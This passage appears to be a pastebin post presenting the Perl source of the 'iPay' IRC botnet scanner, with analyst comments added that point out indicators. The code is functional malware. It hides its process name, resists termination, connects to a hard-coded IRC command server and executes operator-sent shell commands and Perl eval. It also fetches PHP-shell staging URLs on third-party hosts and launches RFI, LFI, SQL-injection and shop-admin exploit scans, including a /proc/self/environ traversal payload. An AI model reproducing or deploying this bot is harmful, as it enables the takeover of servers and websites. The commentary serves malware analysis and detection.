infodox

iPay bot - overview and eventual analysis

Nov 30th, 2011
  1. # Analysis of the iPays bot... or rather, the full kit for you to analyse...
  2. # $injector is HERE --> (add link later, too tired :P)
  3. # $botshell is HERE --> (add link later, too tired :P)
  4. # blah look here too apparently there's an edit http://pastebin.com/79QqXkZB
  5.  
  6. #!/usr/bin/perl
  7. ################################################
  8. use HTTP::Request; #
  9. use HTTP::Request::Common; #
  10. use HTTP::Request::Common qw(POST); #
  11. use LWP::Simple; #
  12. use LWP 5.53; #
  13. use LWP::UserAgent; #
  14. use Socket; #
  15. use IO::Socket; #
  16. use IO::Socket::INET; #
  17. use IO::Select; #
  18. use MIME::Base64; #
  19. ################################################
  20.  
  # Captured once at startup and never refreshed in the visible part of the
  # file; the CTCP TIME reply in the main loop sends this fixed string, so the
  # reply reflects when the process started rather than the current time.
  21. my $datetime = localtime;
  22.  
  # --- C2 and identity configuration (host and network indicators) ---------
  # $fakeproc is copied into $0 further down, so process listings show this
  # string instead of the perl interpreter and script path.
  23. my $fakeproc = "/usr/sbin/apache3 -k start";
  # Default IRC server; replaced by the first command-line argument when given.
  24. my $ircserver = "irc.ganyot.us.to";
  # Passed as PeerPort to a plain TCP socket in connector(); no TLS is set up
  # there, so the control traffic is readable on the wire.
  25. my $ircport = "6667";
  # Nick and ident used at registration.
  26. my $nickname = "timlopus";
  27. my $ident = "jems";
  # Control channel joined after the server's 001 welcome.
  28. my $channel = "#lopus";
  # Operator nick: greeted by private message after the join and sent a copy
  # of RFI findings. isAdmin() is defined outside this part of the file and
  # presumably compares against this value - confirm.
  29. my $admin = "Susis";
  # Not referenced in the visible part of the file; the USER line built in
  # connector() uses its own $versi string as the real-name field.
  30. my $fullname = "Susis IRC Scanner";
  31.  
  # Banner prefixes prepended to channel output, one per scan module. The
  # digit pairs look like mIRC colour codes whose control bytes did not
  # survive the paste - TODO confirm against a raw sample before turning these
  # strings into content signatures.
  # $nob0dy is not referenced in the visible part of the file.
  32. my $nob0dy = "15,1(4@9AspAlt15)";
  33. my $lfilogo = "15,1(4@9LFI15)";
  34. my $rfilogo = "15,1(4@9RFI15)";
  35. my $xmllogo = "15,1(4@9XML15)";
  36. my $sqllogo = "15,1(4@9SQL15)";
  37. my $oscologo = "15,1(4@9OSCO15)";
  38. my $zenlogo = "15,1(4@9ZEN15)";
  39. my $oplogo = "15,1(4@9OPEN15)";
  40. my $lokologo = "15,1(4@9LOKO15)";
  41. my $thumblogo = "15,1(4@9TIMTHUMB15)";
  42.  
  # Channel trigger words for the scan modules. The main loop interpolates
  # each one into a regex anchored at the start of the message text, so these
  # words at the start of a PRIVMSG in captured IRC traffic identify operator
  # activity.
  43. my $lficmd = '!lfi';
  44. my $rficmd = '!rfi';
  45. my $xmlcmd = '!xml';
  46. my $sqlcmd = '!sql';
  47. my $oscocmd = '!osco';
  48. my $zencmd = '!zen';
  49. my $lokocmd = '!loko';
  50. my $opcmd = '!op';
  51. my $thumbcmd = '!thumb';
  52.  
  # Trigger words for the two handlers that pass an operator-supplied URL and
  # command string to cmdlfi() / cmdxml(); both subs are defined outside this
  # part of the file.
  53. my $cmdlfi = '!cmdlfi';
  54. my $cmdxml = '!cmdxml';
  55.  
  # Staging URLs (network indicators). rfi() and rfi_xpl() append these to
  # candidate URLs, and the main loop polls $injector for a marker string
  # before starting most scans. The .jpg extension does not match how the code
  # describes the content (its status messages call it a "PHP Shell").
  # NOTE(review): the hosts look like third-party servers used for staging -
  # treat them as indicators to block and report, not as attribution.
  56. my $injector = "http://sec.usu.ac.id:8080/images/upload_2.jpg";
  # $botshell and $botshell2 hold the same URL.
  57. my $botshell = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
  58. my $botshell2 = "http://sec.usu.ac.id:8080/images/upload_3.jpg";
  # Not referenced in the visible part of the file.
  59. my $thumbshell = "http://blogger.com.autoelectricahernandez.com/x.php";
  60.  
  61. my @uagents = ("Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux 
i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] 
(Windows NT 5.0; U)");
  # One User-Agent is drawn from @uagents when the process starts; $uagent is
  # not re-drawn anywhere in the visible part of the file. The pool consists of
  # long-obsolete browser strings, which makes the HTTP traffic easy to single
  # out in web logs.
  62. my $uagent = $uagents[rand(scalar(@uagents))];
  # Directory-traversal suffix ending in /proc/self/environ plus an encoded NUL
  # byte; the !cmdlfi handlers append it to the operator-supplied URL. Requests
  # carrying long "../" runs that end in proc/self/environ are a reliable
  # web-log signature for this probe.
  63. my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00";
  # FCKeditor connector test page path; not referenced in the visible part of
  # the file.
  64. my $open_test = "/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  # Page-title strings, presumably matched against responses by the LOKO and
  # OPENCART modules defined further down - confirm.
  65. my $loko_output = ("FCKeditor - Resources Browser");
  66. my $open_output = ("FCKeditor - Connectors Tests");
  67.  
  # Word lists of candidate database table names (@tabele) and column names
  # (@kolumny); the identifiers are Polish for "tables" and "columns" and the
  # entries mix several languages. Neither array is referenced in the visible
  # part of the file; presumably they are consumed by the SQL module defined
  # further down - confirm. Queries that enumerate these names in sequence are
  # a useful database- or WAF-log signature.
  68. my @tabele = ('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
  69. 'name','names','nombre','nombres','usuarios','member','members','admin_table','miembro','miembros','membername','admins','administrator',
  70. 'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
  71. 'member_password','mods','mod','moderators','moderator','user_email','user_emails','user_mail','user_mails','mail','emails','email','address',
  72. 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
  73. 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
  74. 'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
  75. 'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
  76. 'associated','accnt','customers','customer','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
  77. 'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
  78. my @kolumny = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',
  79. 'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',
  80. 'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',
  81. 'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',
  82. 'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
  83. 'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');
  # Ignore the usual termination signals so that Ctrl-C, a hang-up or a plain
  # kill does not stop the process; SIGKILL is not (and cannot be) in this
  # list. CHLD is ignored as well, which on POSIX systems normally lets exited
  # children be reaped automatically.
  84. $SIG{'INT'} = 'IGNORE';
  85. $SIG{'HUP'} = 'IGNORE';
  86. $SIG{'TERM'} = 'IGNORE';
  87. $SIG{'CHLD'} = 'IGNORE';
  # NOTE(review): 'PS' is not a standard signal name; this entry presumably
  # has no effect.
  88. $SIG{'PS'} = 'IGNORE';
  # An optional first argument replaces the built-in C2 host.
  89. $ircserver = "$ARGV[0]" if $ARGV[0];
  # Process-name masquerade: $0 is overwritten with $fakeproc, NUL-padded.
  # For triage, compare the command line that ps reports with the process's
  # real executable (for example /proc/<pid>/exe on Linux); a mismatch between
  # a web-server name and a perl binary is the host indicator here.
  90. $0 = "$fakeproc"."\0" x 16;;
  # Detach: the parent exits at once and the child carries on in the
  # background; a failed fork aborts with the message below.
  91. my $pid = fork;
  92. exit if $pid;
  93. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  94.  
  # Connection table keyed by the stringified socket; filled in connector()
  # and consulted by the main loop.
  95. our %irc_servers;
  # %DCC and $dcc_sel are not referenced again in the visible part of the file.
  96. our %DCC;
  97. my $dcc_sel = new IO::Select->new();
  # Select set polled by the main loop. It is assigned without my/our, so it
  # is a package global (the visible preamble does not enable strict).
  98. $sel_client = IO::Select->new();
  # sendraw(SOCKET, LINE) or sendraw(LINE): write one raw IRC protocol line.
  # With exactly two arguments the line goes to the given socket; otherwise
  # it goes to the global $IRC_cur_socket. The text is written as given, with
  # only "\n" appended; nothing here filters or escapes it.
  99. sub sendraw {
  # $#_ is the last index of @_, so this holds for exactly two arguments.
  100. if ($#_ == '1') {
  101. my $socket = $_[0];
  102. print $socket "$_[1]\n";
  103. } else {
  104. print $IRC_cur_socket "$_[0]\n";
  105. }
  106. }
  107.  
  # connector(NICK, HOST, PORT): open the control connection and register.
  # Returns 1 straight away when the TCP connect fails. On success the socket
  # becomes the global current socket, is added to the select set and to
  # %irc_servers, and the NICK/USER registration lines are sent.
  108. sub connector {
  109. my $mynick = $_[0];
  110. my $ircserver_con = $_[1];
  111. my $ircport_con = $_[2];
  # Plain TCP; no TLS layer is configured here.
  112. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  113. if (defined($IRC_socket)) {
  114. $IRC_cur_socket = $IRC_socket;
  115. $IRC_socket->autoflush(1);
  116. $sel_client->add($IRC_socket);
  117. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  118. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  119. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  # The infected host's own address on this connection is recorded...
  120. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  # nick() is defined outside this part of the file.
  121. nick("$mynick");
  # ...and also sent to the server inside the USER line, together with a fixed
  # real-name string. A USER line that carries the client's local IP in its
  # second field plus this banner text is a usable network signature.
  122. my $versi = "9,1[!] 1,15 Maza CreW 9,1 [!]";
  123. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
  124. sleep (1);}}
  # parse(LINE): handle one server line for connection housekeeping (keep-alive,
  # nick tracking, post-registration join). Operator commands are handled in
  # the main loop, not here. $mynick, $channel, $admin and $IRC_cur_socket are
  # read from the enclosing file scope.
  125. sub parse {
  126. my $servarg = shift;
  # Keep-alive: answer PING with the same token.
  127. if ($servarg =~ /^PING \:(.*)/) {
  128. sendraw("PONG :$1");
  129. }
  # A NICK change was announced; if it concerns this bot, track the new nick.
  130. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  131. if (lc($1) eq lc($mynick)) {
  132. $mynick = $4;
  133. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  134. }
  135. }
  # 433 = nickname already in use. int rand(1) always evaluates to 0, so the
  # retry nick is the current nick with "0" appended.
  136. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  137. nick("$mynick".int rand(1));
  138. }
  # 001 = registration accepted: adopt the nick the server reports, set user
  # mode +i, join the control channel, wait two seconds and greet the operator
  # nick by private message. This fixed sequence of lines is a usable network
  # signature for the bot's check-in.
  139. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  140. $mynick = $2;
  141. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  142. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  143. sendraw("MODE $mynick +i");
  144. sendraw("JOIN $channel");
  145. sleep(2);
  146. sendraw("PRIVMSG $admin :Hi $admin im here !!!");
  147. }
  148. }
  # Main event loop: keep a control connection alive, read from it, act on
  # PRIVMSG commands, then feed the received lines to parse().
  # isAdmin(), shell(), msg(), notice(), isFound(), cmdlfi() and cmdxml() are
  # defined outside this part of the file. Every isAdmin() call below passes
  # only the sender's nick.
  # Holds an incomplete trailing line between reads (see the for loop at the end).
  149. my $line_temp;
  150. while( 1 ) {
  # While no connection is registered, connector() is called again immediately;
  # it returns at once on a failed connect and nothing here waits between
  # attempts, so an unreachable C2 shows up as a rapid stream of outbound
  # connection attempts to the configured port.
  151. while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
  # 10 ms pause per iteration.
  152. select(undef, undef, undef, 0.01);;
  153. delete($irc_servers{''}) if (defined($irc_servers{''}));
  154. my @ready = $sel_client->can_read(0);
  155. next unless(@ready);
  156. foreach $fh (@ready) {
  157. $IRC_cur_socket = $fh;
  158. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  159. $nread = sysread($fh, $ircmsg, 4096);
  # A zero-byte read means the peer closed: drop the socket so that the
  # reconnect loop above runs again.
  160. if ($nread == 0) {
  161. $sel_client->remove($fh);
  162. $fh->close;
  163. delete($irc_servers{$fh});
  164. }
  165. @lines = split (/\n/, $ircmsg);
  166. $ircmsg =~ s/\r\n$//;
  167.  
  # The command match runs against the whole read buffer, not line by line.
  # $path is the PRIVMSG target: the bot's own nick for a private message,
  # otherwise a channel name. The lexical $ident here shadows the file-level one.
  168. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  169. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  # Full engine list handed to scan_start() by every scan command below.
  170. my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
  # ---- Private messages addressed to the bot ----
  171. if ($path eq $mynick) {
  # PING / VERSION / TIME replies sent as NOTICEs. The VERSION reply claims to
  # be an mIRC client although the sender is a Perl script; that fixed string
  # is a network signature.
  172. if ($msg =~ /^PING (.*)/) {
  173. sendraw("NOTICE $nick :PING $1");
  174. }
  175. if ($msg =~ /^VERSION/) {
  176. sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
  177. }
  178. if ($msg =~ /^TIME/) {
  179. sendraw("NOTICE $nick :TIME ".$datetime."");
  180. }
  # Operator-gated housekeeping: self-termination, killing every perl process
  # on the host, reconnect, join/part/nick change, and disclosure of the fake
  # process name and PID.
  181. if (&isAdmin($nick) && $msg eq "!die") {
  182. &shell("$path","kill -9 $$");
  183. }
  184. if (&isAdmin($nick) && $msg eq "!killall") {
  185. &shell("$path","killall -9 perl");
  186. }
  187. if (&isAdmin($nick) && $msg eq "!reset") {
  188. sendraw("QUIT :Restarting...");
  189. }
  190. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  191. sendraw("JOIN #".$1);
  192. }
  193. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  194. sendraw("PART #".$1);
  195. }
  196. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  197. sendraw("NICK ".$1);
  198. }
  199. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  200. sendraw($IRC_cur_socket, "PRIVMSG $nick :9,1Fake Process/PID : $fakeproc - $$");
  201. }
  # Any private message from the operator nick that does not start with "!" is
  # handed to shell() as a command line: this is the bot's remote command
  # execution path on the infected host.
  202. if (&isAdmin($nick) && $msg !~ /^!/) {
  203. &shell("$nick","$msg");
  204. }
  205. if (&isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  206. my $url = $1.$lfdtest;
  207. my $cmd = $2;
  208. &cmdlfi($url,$cmd,$nick);
  209. }
  210. if (&isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  211. my $url = $1;
  212. my $cmd = $2;
  213. &cmdxml($url,$cmd,$nick);
  214. }
  215. }
  # ---- Messages sent to a channel ----
  216. else {
  217. if (&isAdmin($nick) && $msg eq "!die") {
  218. &shell("$path","kill -9 $$");
  219. }
  220. if (&isAdmin($nick) && $msg eq "!killall") {
  221. &shell("$path","killall -9 perl");
  222. }
  223. if (&isAdmin($nick) && $msg eq "!reset") {
  224. sendraw("QUIT :Restarting...");
  225. }
  226. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  227. sendraw("JOIN #".$1);
  228. }
  229. if (&isAdmin($nick) && $msg eq "!part") {
  230. sendraw("PART $path");
  231. }
  232. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  233. sendraw("PART #".$1);
  234. }
  # Operator-gated command execution from the channel: ".sh <cmd>" and
  # "<botnick> <cmd>" both reach shell().
  235. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  236. &shell("$path","$1");
  237. }
  238. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  239. &shell("$path","$1");
  240. }
  # Operator-gated string eval: the captured text is executed as Perl inside
  # the bot process.
  241. if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
  242. eval "$1";
  243. }
  244. ##################################################################### HIT
  245.  
  # From here to the end of this branch only the !pid handler calls isAdmin();
  # the remaining handlers act on the trigger word alone.
  246. if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
  247. my $url = $1.$lfdtest;
  248. my $cmd = $2;
  249. &cmdlfi($url,$cmd,$path);
  250. }
  251. if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
  252. my $url = $1;
  253. my $cmd = $2;
  254. &cmdxml($url,$cmd,$path);
  255. }
  256.  
  257. ##################################################################### HELP COMMAND
  258.  
  # Informational replies (!help, !engine, !about, !version). Their fixed
  # banner text is useful for matching this family in captured IRC traffic.
  259. if ($msg=~ /^!help/) {
  260. my $helplogo = "15,1(4@9Help15)";
  261. &msg("$path","$helplogo 14 #####################9[HELP]14##############################");
  262. &msg("$path","$helplogo 7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|$thumbcmd [bug][dork]|!portscan[ip][port]) )");
  263. &msg("$path","$helplogo 7 ( $cmdlfi|$cmdxml) [target][cmd] )");
  264. &msg("$path","$helplogo 7 ( $zencmd | $oscocmd | $lokocmd | $opcmd [dork] ) ");sleep(2);
  265. &msg("$path","$helplogo 7 ( !about|!engine|!version|!pid )");
  266. &msg("$path","$helplogo 14 ######################9[END HELP]14#########################");
  267. }
  268. if ($msg=~ /^!engine/) {
  269. my $enginelogo = "15,1(4@9EnginE15)";
  270. &msg("$path","$enginelogo 4 GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio");
  271. &msg("$path","$enginelogo 4 WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo");
  272. &msg("$path","$enginelogo 4 BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR");
  273. }
  274. if ($msg=~ /^!about/) {
  275. my $aboutlogo = "15,1(4@9About Bot15)";
  276. &msg("$path","$aboutlogo 9Nob0dy Priv8 Scanner SE v1.2 Coded by Vrs-hCk");
  277. &msg("$path","$aboutlogo 13CoDeD by c0li ByroeNet");
  278. &msg("$path","$aboutlogo 7Modified by ipays ByroeNet");
  279. }
  280. if ($msg=~ /^!version/) {
  281. my $versionlogo = "15,1(4@9Version15)";
  282. &msg("$path","$versionlogo 13 priv8 SE v1.2");
  283. }
  # Health check of the staging URL: isFound() is asked whether $injector still
  # serves the marker string. The marker is the base64 encoding of "JANCOK"
  # followed by "=", consistent with the "JANCOK- exploit" text that rfi_xpl()
  # looks for in responses.
  284. if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
  285. if (&isFound($injector,"SkFOQ09L=")) {
  286. &msg("$path","15,1(4@9Injector15)13 PHP Shell 9READY!!!");
  287. } else {
  288. &msg("$path","15,1(4@9Injector15)13 PHP Shell 4LOST!!!");
  289. }
  290. }
  291. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  292. &notice("$nick","9,1Fake Process/PID : 8$fakeproc - $$");
  293. }
  294.  
  295. ##################################################################### RFI SCAN
  296.  
  # Scan commands. Each handler below follows one pattern: fork, have the child
  # fork again and exit so that the grandchild is detached from the main loop,
  # then call scan_start() with a numeric module code (1-9). On an infected
  # host this appears as bursts of short-lived perl child processes. RFI, LFI,
  # XML and OSCO first require the staging URL to answer the marker check.
  297. if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
  298. if (my $pid = fork) {
  299. waitpid($pid, 0);
  300. }
  301. else {
  302. if (fork) { exit; } else {
  303. if (&isFound($injector,"SkFOQ09L=")) {
  304. my ($bug,$dork) = ($1,$2);
  305. &msg("$path","$rfilogo 9Dork :4 $dork");
  306. &msg("$path","$rfilogo 13Bugz :4 $bug");
  307. &msg("$path","$rfilogo 8Search Engine Loading ...");
  308. &scan_start($path,$bug,$dork,$engine,1);
  309. } else {
  310. &msg("$path","[ $nick ] $rfilogo 4PHP Shell Not Found!");
  311. }
  312. }
  313. exit;
  314. }
  315. }
  316.  
  317. ##################################################################### LFI SCAN
  318.  
  319. if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
  320. if (my $pid = fork) {
  321. waitpid($pid, 0);
  322. }
  323. else {
  324. if (fork) { exit; } else {
  325. if (&isFound($injector,"SkFOQ09L=")) {
  326. my ($bug,$dork) = ($1,$2);
  327. &msg("$path","$lfilogo 9Dork :4 $dork");
  328. &msg("$path","$lfilogo 13Bugz :4 $bug");
  329. &msg("$path","$lfilogo 8Search Engine Loading ...");
  330. &scan_start($path,$bug,$dork,$engine,2);
  331. } else {
  332. &msg("$path","[ $nick ] $lfilogo 4PHP Shell Not Found!");
  333. }
  334. }
  335. exit;
  336. }
  337. }
  338.  
  339. ##################################################################### XML SCAN
  340. if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
  341. if (my $pid = fork) {
  342. waitpid($pid, 0);
  343. }
  344. else {
  345. if (fork) { exit; } else {
  346. if (&isFound($injector,"SkFOQ09L=")) {
  347. my ($bug,$dork) = ($1,$2);
  348. &msg("$path","$xmllogo 9Dork :4 $dork");
  349. &msg("$path","$xmllogo 13Bugz :4 $bug");
  350. &msg("$path","$xmllogo 8Search Engine Loading ...");
  351. &scan_start($path,$bug,$dork,$engine,3);
  352. } else {
  353. &msg("$path","[ $nick ] $xmllogo 4PHP Shell Not Found!");
  354. }
  355. }
  356. exit;
  357. }
  358. }
  359.  
  360. ##################################################################### SQL SCAN
  361.  
  362. if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
  363. if (my $pid = fork) {
  364. waitpid($pid, 0);
  365. }
  366. else {
  367. if (fork) { exit; } else {
  368. my ($bug,$dork) = ($1,$2);
  369. &msg("$path","$sqllogo 9Dork :4 $dork");
  370. &msg("$path","$sqllogo 13Bugz :4 $bug");
  371. &msg("$path","$sqllogo 8Search Engine Loading ...");
  372. &scan_start($path,$bug,$dork,$engine,4);
  373. }
  374. exit;
  375. }
  376. }
  377.  
  378. ##################################################################### OSCO SCAN
  379.  
  # The OSCO trigger is handled twice in a row with two different hard-coded
  # admin paths; the second pass prints no banner. The same applies to the two
  # ZEN handlers further down. These fixed paths are what to search for in the
  # access logs of the corresponding shop software.
  380. if ($msg=~ /^$oscocmd\s+(.*)/) {
  381. if (my $pid = fork) {
  382. waitpid($pid, 0);
  383. }
  384. else {
  385. if (fork) { exit; } else {
  386. if (&isFound($injector,"SkFOQ09L=")) {
  387. my ($bug,$dork) = ("admin/categories.php/login.php?cPath=&action=new_product_preview",$1);
  388. &msg("$path","$oscologo 9Dork :4 $dork");
  389. &msg("$path","$oscologo 8Search Engine Loading ...");
  390. &scan_start($path,$bug,$dork,$engine,5);
  391. } else {
  392. &msg("$path","[ $nick ] $oscologo 4PHP Shell Not Found!");
  393. }
  394. }
  395. exit;
  396. }
  397. }
  398. ##################################################################### OSCO SCAN
  399.  
  400. if ($msg=~ /^$oscocmd\s+(.*)/) {
  401. if (my $pid = fork) {
  402. waitpid($pid, 0);
  403. }
  404. else {
  405. if (fork) { exit; } else {
  406. if (&isFound($injector,"SkFOQ09L=")) {
  407. my ($bug,$dork) = ("admin/file_manager.php/login.php",$1);
  408. &scan_start($path,$bug,$dork,$engine,5);
  409. } else {
